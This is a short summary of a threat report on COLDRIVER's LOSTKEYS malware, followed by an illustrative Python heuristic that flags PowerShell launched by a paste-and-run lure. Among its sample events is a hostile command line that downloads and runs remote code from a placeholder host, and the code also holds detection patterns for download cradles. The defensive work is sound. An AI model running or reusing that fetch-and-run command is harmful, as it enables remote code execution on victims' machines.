Threat group COLDRIVER is employing a new malware known as LOSTKEYS to steal documents from Western targets, as reported by Google Threat Intelligence on May 7. This malware represents an evolution from simple credential phishing to more advanced attacks. The installation of LOSTKEYS proceeds in four key stages: a lure website featuring a fake CAPTCHA, a PowerShell script placed in the user's clipboard, evasion techniques to bypass detection, and the retrieval of the final payload. Once installed, LOSTKEYS can steal files based on hard-coded extensions and directories, and it sends system information and running-process details back to COLDRIVER. The report highlights a significant surge in crypto hacks in 2025, with total losses reaching $2 billion in just the first quarter, underscoring the continued prevalence of operational flaws and social engineering tactics among attackers.
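The first two stages described above (a fake-CAPTCHA lure that drops a PowerShell command into the clipboard for the user to run) leave a recognisable footprint in process-creation telemetry: PowerShell spawned from an interactive parent such as explorer.exe, with a download cradle, hidden window, or encoded command on the command line. The scoring heuristic below is an added example written for this summary, not code from the Google Threat Intelligence report or from any detection product; the sample events, the indicator weights, and the alert threshold are all constructed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (e.g. Sysmon Event ID 1 or EDR telemetry)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry for this example; not taken from the report.
SAMPLE_EVENTS = [
    # Benign: a scheduled backup run from a batch file.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    # Suspicious: pasted into the Run dialog, hidden window, fetches and runs remote code.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -c \"iex (iwr 'http://placeholder.invalid/stage1' -UseBasicParsing)\""),
    # Benign: a user double-clicking a local script in Explorer.
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Users\alice\tools\rename-photos.ps1"),
    # Low signal: an encoded command from a service host (needs decoding before judging).
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQAwAA=="),
]

# Indicator patterns (case-insensitive). Each is a weak signal on its own.
IS_POWERSHELL = re.compile(r"(powershell|pwsh)(\.exe)?$", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|net\.webclient", re.I)
INVOKE_EXPRESSION = re.compile(r"invoke-expression|\biex\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
ENCODED_COMMAND = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)

# Parents that indicate a user-driven launch (Run dialog / Explorer) rather than a script host or service.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Hypothetical weights and threshold chosen for this example; tune against your own baseline.
ALERT_THRESHOLD = 4


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event; 0 for non-PowerShell images."""
    reasons: list[str] = []
    if not IS_POWERSHELL.search(ev.image):
        return 0, reasons
    score = 0
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("launched from interactive shell (Run dialog / Explorer)")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        score += 2
        reasons.append("download cradle on command line")
    if INVOKE_EXPRESSION.search(ev.command_line):
        score += 1
        reasons.append("in-memory execution via Invoke-Expression")
    if HIDDEN_WINDOW.search(ev.command_line):
        score += 1
        reasons.append("hidden window requested")
    if ENCODED_COMMAND.search(ev.command_line):
        score += 1
        reasons.append("encoded command")
    return score, reasons


def flagged_events(events: list[ProcessEvent], threshold: int = ALERT_THRESHOLD) -> list[int]:
    """Indices of events whose score meets the alert threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        s, why = score_event(ev)
        print(f"event {i}: score={s} {'ALERT' if s >= ALERT_THRESHOLD else 'ok'} {why}")
```

The combination matters more than any single indicator: a script double-clicked in Explorer or a service running an encoded command each score low on their own, while the paste-and-run pattern (interactive parent, download cradle, hidden window, Invoke-Expression) stacks enough signals to cross the threshold. In production, decode `-EncodedCommand` payloads before scoring and feed the result back through the same patterns.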
